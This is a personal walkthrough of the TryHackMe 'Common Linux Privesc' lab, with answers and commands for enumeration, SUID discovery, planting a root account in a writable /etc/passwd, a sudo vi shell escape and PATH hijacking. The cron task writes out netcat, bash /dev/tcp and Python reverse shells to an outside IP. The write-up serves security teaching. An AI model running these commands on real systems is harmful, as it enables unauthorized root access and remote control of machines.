-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCommon Linux Privesc
285 lines (186 loc) · 14.6 KB
/
Common Linux Privesc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
#Task 2 Understanding Privesc
What does "privilege escalation" mean?
At it's core, Privilege Escalation usually involves going from a lower permission to a higher permission. More technically, it's the exploitation of a vulnerability, design flaw or configuration oversight in an operating system or application to gain unauthorized access to resources that are usually restricted from the users.
Why is it important?
Rarely when doing a CTF or real-world penetration test, will you be able to gain a foothold (initial access) that affords you administrator access. Privilege escalation is crucial, because it lets you gain system administrator levels of access. This allow you to do many things, including:
Reset passwords
Bypass access controls to compromise protected data
Edit software configurations
Enable persistence, so you can access the machine again later.
Change privilege of users
Get that cheeky root flag ;)
As well as any other administrator or super user commands that you desire.
#Task 3 Direction of Privilege Escalation
There are two main privilege escalation variants:
Horizontal privilege escalation: This is where you expand your reach over the compromised system by taking over a different user who is on the same privilege level as you. For instance, a normal user hijacking another normal user (rather than elevating to super user). This allows you to inherit whatever files and access that user has. This can be used, for example, to gain access to another normal privilege user, that happens to have an SUID file attached to their home directory (more on these later) which can then be used to get super user access. [Travel sideways on the tree]
Vertical privilege escalation (privilege elevation): This is where you attempt to gain higher privileges or access, with an existing account that you have already compromised. For local privilege escalation attacks this might mean hijacking an account with administrator privileges or root privileges. [Travel up on the tree]
#Task 4 Enumeration
mykali: python3 -m http.server 8000
or python3 -m SimpleHTTPServer 8000
vi LinEnum.sh
cp raw from https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
- First, lets SSH into the target machine, using the credentials user3:password. This is to simulate getting a foothold on the system as a normal privilege user.
hint: from target machine: wget http://localip:8000/LinEnum.sh
./LinEnum.sh
- What is the target's hostname?
nmap -sSVC -Pn -vv $IP
polobox
- Look at the output of /etc/passwd how many "user[x]" are there on the system?
hint: cat /etc/passwd | grep user
or grep /etc/passwd -e 'user[0-9]' | wc -l
8
- How many available shells are there on the system?
hint: grep /etc/shells -e bin | wc -l
5
- What is the name of the bash script that is set to run every 5 minutes by cron?
hint: cat /etc/crontab
autoscript.sh
- What critical file has had its permissions changed to allow some users to write to it?
hint: ls /etc/passwd -ls
/etc/passwd
#Task 5 Abusing SUID/GUID Files
- What is the path of the file in user3's directory that stands out to you?
hint: find / -perm -u=s -type f 2>/dev/null
or ./LinEnum.sh
/home/user3/shell
#Task 6 Exploiting Writeable /etc/passwd
Exploiting a writable /etc/passwd
Continuing with the enumeration of users, we found that user7 is a member of the root group with gid 0. And we already know from the LinEnum scan that /etc/passwd file is writable for the user. So from this observation, we concluded that user7 can edit the /etc/passwd file.
Understanding /etc/passwd
The /etc/passwd file stores essential information, which is required during login. In other words, it stores user account information. The /etc/passwd is a plain text file. It contains a list of the system’s accounts, giving for each account some useful information like user ID, group ID, home directory, shell, and more.
The /etc/passwd file should have general read permission as many command utilities use it to map user IDs to user names. However, write access to the /etc/passwd must only limit for the superuser/root account. When it doesn't, or a user has erroneously been added to a write-allowed group. We have a vulnerability that can allow the creation of a root user that we can access.
Understanding /etc/passwd format
The /etc/passwd file contains one entry per line for each user (user account) of the system. All fields are separated by a colon : symbol. Total of seven fields as follows. Generally, /etc/passwd file entry looks as follows:
test:x:0:0:root:/root:/bin/bash
[as divided by colon (:)]
Username: It is used when user logs in. It should be between 1 and 32 characters in length.
Password: An x character indicates that encrypted password is stored in /etc/shadow file. Please note that you need to use the passwd command to compute the hash of a password typed at the CLI or to store/update the hash of the password in /etc/shadow file, in this case, the password hash is stored as an "x".
User ID (UID): Each user must be assigned a user ID (UID). UID 0 (zero) is reserved for root and UIDs 1-99 are reserved for other predefined accounts. Further UID 100-999 are reserved by system for administrative and system accounts/groups.
Group ID (GID): The primary group ID (stored in /etc/group file)
User ID Info: The comment field. It allow you to add extra information about the users such as user’s full name, phone number etc. This field use by finger command.
Home directory: The absolute path to the directory the user will be in when they log in. If this directory does not exists then users directory becomes /
Command/shell: The absolute path of a command or shell (/bin/bash). Typically, this is a shell. Please note that it does not have to be a shell.
How to exploit a writable /etc/passwd
It's simple really, if we have a writable /etc/passwd file, we can write a new line entry according to the above formula and create a new user! We add the password hash of our choice, and set the UID, GID and shell to root. Allowing us to log in as our own root user!
- First, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user7, with the password "password"
no answer
- Having read the information above, what direction privilege escalation is this attack?
vertical
- Before we add our new user, we first need to create a compliant password hash to add! We do this by using the command: "openssl passwd -1 -salt [salt] [password]"
What is the hash created by using this command with the salt, "new" and the password "123"?
hint: openssl passwd -1 salt new 123
$1$new$p7ptkEKU1HnaHpRtzNizS1
- Great! Now we need to take this value, and create a new root user account. What would the /etc/passwd entry look like for a root user with the username "new" and the password hash we created before?
vi /etc/passwd
add end line
new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
- Now, use "su" to login as the "new" account, and then enter the password. If you've done everything correctly- you should be greeted by a root prompt! Congratulations!
hint: su new
#
no answer
#Task 7 Escaping Vi Editor
Sudo -l
This exploit comes down to how effective our user account enumeration has been. Every time you have access to an account during a CTF scenario, you should use "sudo -l" to list what commands you're able to use as a super user on that account. Sometimes, like this, you'll find that you're able to run certain commands as a root user without the root password. This can enable you to escalate privileges.
Escaping Vi
Running this command on the "user8" account shows us that this user can run vi with root privileges. This will allow us to escape vim in order to escalate privileges and get a shell as the root user!
Misconfigured Binaries and GTFOBins
If you find a misconfigured binary during your enumeration, or when you check what binaries a user account you have access to can access, a good place to look up how to exploit them is GTFOBins. GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. It provides a really useful breakdown of how to exploit a misconfigured binary and is the first place you should look if you find one on a CTF or Pentest.
https://gtfobins.github.io/
- First, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user8, with the password "password"
no answer
- Let's use the "sudo -l" command, what does this user require (or not require) to run vi as root?
NOPASSWD
- So, all we need to do is open vi as root, by typing "sudo vi" into the terminal.
hint : sudo vi
no answer
- Now, type ":!sh" to open a shell!
sudo vi
:!sh
#whoami
root
no answer
#Task 8 Exploiting Crontab
- First, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user4, with the password "password"
no answer
- Now, on our host machine- let's create a payload for our cron exploit using msfvenom.
no answer
- What is the flag to specify a payload in msfvenom?
hint: msfvenom --help | grep payload
-p
- Create a payload using: "msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R"
hint: msfvenom -p cmd/unix/reverse_netcat lhost=localip lport=8888 R
no answer
- What directory is the "autoscript.sh" under?
/home/user4/Desktop
- Lets replace the contents of the file with our payload using: "echo [MSFVENOM OUTPUT] > autoscript.sh"
hint: cd /home/user4/Desktop
echo 'mkfifo /tmp/ociku; nc 10.6.88.227 8888 0</tmp/ociku | /bin/sh >/tmp/ociku 2>&1; rm /tmp/ociku' >autoscript.sh
no answer
- After copying the code into autoscript.sh file we wait for cron to execute the file, and start our netcat listener using: "nc -lvnp 8888" and wait for our shell to land!
hint: on mykali: nc -lnvp 8888
no answer
OR if dont use msfvenom
i can use:
cd /home/user4/Desktop
echo 'bash -i >& /dev/tcp/10.6.88.227/8888 0>&1' >autoscript.sh
on mykali: nc -lnvp 8888
wait 5 minutes not work
i try run: which python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.6.88.227",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
on mykali: nc -lnvp 8888
#Task 9 Exploiting PATH Variable
What is PATH?
PATH is an environmental variable in Linux and Unix-like operating systems which specifies directories that hold executable programs. When the user runs any command in the terminal, it searches for executable files with the help of the PATH Variable in response to commands executed by a user.
It is very simple to view the Path of the relevant user with help of the command "echo $PATH".
How does this let us escalate privileges?
Let's say we have an SUID binary. Running it, we can see that it’s calling the system shell to do a basic process like list processes with "ps". Unlike in our previous SUID example, in this situation we can't exploit it by supplying an argument for command injection, so what can we do to try and exploit this?
We can re-write the PATH variable to a location of our choosing! So when the SUID binary calls the system shell to run an executable, it runs one that we've written instead!
As with any SUID file, it will run this command with the same privileges as the owner of the SUID file! If this is root, using this method we can run whatever commands we like as root!
- Going back to our local ssh session, not the netcat root session, you can close that now, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user5, with the password "password"
no answer
- Let's go to user5's home directory, and run the file "script". What command do we think that it's executing?
chmod +x script
./script
ls
- Now we know what command to imitate, let's change directory to "tmp".
hint: cd /tmp
- Now we're inside tmp, let's create an imitation executable. The format for what we want to do is:
echo "[whatever command we want to run]" > [name of the executable we're imitating]
What would the command look like to open a bash shell, writing to a file with the name of the executable we're imitating
hint: echo "/bin/bash" > ls
- Great! Now we've made our imitation, we need to make it an executable. What command do we execute to do this?
chmod +x ls
Now, we need to change the PATH variable, so that it points to the directory where we have our imitation "ls" stored! We do this using the command "export PATH=/tmp:$PATH"
Note, this will cause you to open a bash prompt every time you use "ls". If you need to use "ls" before you finish the exploit, use "/bin/ls" where the real "ls" executable is.
Once you've finished the exploit, you can exit out of root and use "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$PATH" to reset the PATH variable back to default, letting you use "ls" again!
hint: export PATH=/tmp:$PATH
cd ~
./script
whoami
root
#set PATH back to normal
# export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$PATH
ls
no answer
- Now, change directory back to user5's home directory.
cd /home/user5
no answer
- Now, run the "script" file again, you should be sent into a root bash prompt! Congratulations!
./script
no answer
#Task 10 Expanding Your Knowledge
Further Learning
There is never a "magic" answer in the huge area that is Linux Privilege Escalation. This is simply a few examples of basic things to watch out for when trying to escalate privileges.The only way to get better at it, is to practice and build up experience. Checklists are a good way to make sure you haven't missed anything during your enumeration stage, and also to provide you with a resource to check how to do things if you forget exactly what commands to use.
Below is a list of good checklists to apply to CTF or penetration test use cases.Although I encourage you to make your own using CherryTree or whatever notes application you prefer.
https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html
https://payatu.com/guide-linux-privilege-escalation
Thank you
Thanks for taking the time to work through this room, I wish you the best of luck in future.
~ Polo
https://tryhackme.com/room/commonlinuxprivesc
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
https://www.aldeid.com/wiki/TryHackMe-Common-Linux-Privesc
https://juliette1012.github.io/posts/THM-Common-Linux-Privesc/
https://ratiros01.medium.com/tryhackme-common-linux-privesc-b9424aeee36f